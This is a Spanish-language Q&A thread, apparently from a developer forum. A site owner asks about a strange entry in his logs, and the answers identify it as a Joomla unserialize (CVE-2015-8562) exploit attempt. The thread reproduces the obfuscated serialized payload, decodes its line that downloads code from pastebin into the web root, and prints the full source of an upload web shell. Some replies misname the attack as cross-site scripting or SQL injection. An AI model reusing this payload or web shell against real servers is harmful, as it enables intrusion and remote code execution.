# ¿Esto es un intento de hackeo?

Tags: php

Hace un tiempo desarrollé una web escrita en PHP puro, sin base de datos. Los usuarios y contenidos se administran por directorios desde una parte administrativa. La doté de mucha seguridad para que no se pueda acceder externamente a los contenidos y se puedan romper fácilmente las contraseñas.

La cuestión es que el la parte donde veo las IP de conexiones diarias que se registran en un archivo de texto, me encuentro lo siguiente:

```
}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:979:"eval(chr(102).chr(119).chr(114).chr(105).chr(116).chr(101).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(36).chr(95).chr(83).chr(69).chr(82).chr(86).chr(69).chr(82).chr(91).chr(39).chr(68).chr(79).chr(67).chr(85).chr(77).chr(69).chr(78).chr(84).chr(95).chr(82).chr(79).chr(79).chr(84).chr(39).chr(93).chr(46).chr(39).chr(47).chr(114).chr(120).chr(114).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(43).chr(39).chr(41).chr(44).chr(102).chr(105).chr(108).chr(101).chr(95).chr(103).chr(101).chr(116).chr(95).chr(99).chr(111).chr(110).chr(116).chr(101).chr(110).chr(116).chr(115).chr(40).chr(39).chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(112).chr(97).chr(115).chr(116).chr(101).chr(98).chr(105).chr(110).chr(46).chr(99).chr(111).chr(109).chr(47).chr(114).chr(97).chr(119).chr(47).chr(75).chr(102).chr(104).chr(66).chr(114).chr(106).chr(82).chr(98).chr(39).chr(41).chr(41).chr(59));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}
```

Esto me suena a un posible intento de inyección de código... sin éxito alguno!.
Alguien puede identificarlo y explicarme de que se trata?.
Gracias de antemano!!!.

Answer (score 13, accepted):

Si conviertes los "chr" obtienes la cadena:
`fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/rxr1php','w+'),file_get_contents('https://pastebin.com/raw/KfhBrjRb'));`

El script en cuestión es el siguiente:

```
 <?php
// name of the file is: i (it has no extension)
error_reporting(0);
$Ye = "_Ye";
if (isset($_GET["rxr"])) {
    echo "RxR HaCkEr{$Ye} <font color=#000FFF>[uname]" . php_uname() . "[/uname]";
    echo "<br>";
    print "\n";
    if (@ini_get("disable_functions")) {
        echo "DisablePHP=" . @ini_get("disable_functions");
    } else {
        echo "Disable PHP = NONE";
    }
    echo "<br>";
    print "\n";
    if (@ini_get("safe_mode")) {
        echo "Safe Mode = ON";
    } else {
        echo "Safe Mode = OFF";
    }
    echo "<br>";
    print "\n";
    echo "<form method=post enctype=multipart/form-data>";
    echo "<input type=file name=f><input name=v type=submit id=v value=up><br>";
    if ($_POST["v"] == up) {
        if (@copy($_FILES["f"]["tmp_name"], $_FILES["f"]["name"])) {
            echo "<b>berhasil</b>-->" . $_FILES["f"]["name"];
        } else {
            echo "<b>gagal";
        }
    }
}

echo 'uname:' . php_uname() . "\n";
echo getcwd() . "\n";

?>
```

Permite obtener información del servidor (Tipo de sistema operativo, nombre del equipo, versión del sistema operativo, arquitectura del procesador y la ruta base del servidor web):
[image: introducir la descripción de la imagen aquí]

Y al parecer lo utilizan para realizar ataques dependiendo el tipo de máquina que se tenga:

- https://pastebin.com/zUUhYF5M
- https://gist.github.com/kuldeep1337/820ac7b420e9a19f5194503369f1301e).

---

**Actualización:**

Creo que se trata de un intento de explotación de la vulnerabilidad CVE-2015-8562: https://blog.cloudflare.com/the-joomla-unserialize-vulnerability/

Comment: Me acabas de aclarar una duda muy importante, estaré al tanto y me documentaré en profundo. Gracias!!!

Comment: Por lo que veo, es una intención de inyección SQL, en mi caso nunca tendrá éxito...

Comment: Correcto, tu servidor no está afectado por esa vulnerabilidad. Revisa si siempre es la misma IP desde la que se realizan los intentos de inyección y si es así bloqueala con el firewall

Answer (score 1):

Si es una inyeccion de codigo de tipo cross site scripting, apenas esta haciendo la recolección de datos, sanitiza bien tus inputs y mira con nmap que no tengas abierto los puertos que no deberias.
https://php.net/manual/es/filter.filters.sanitize.php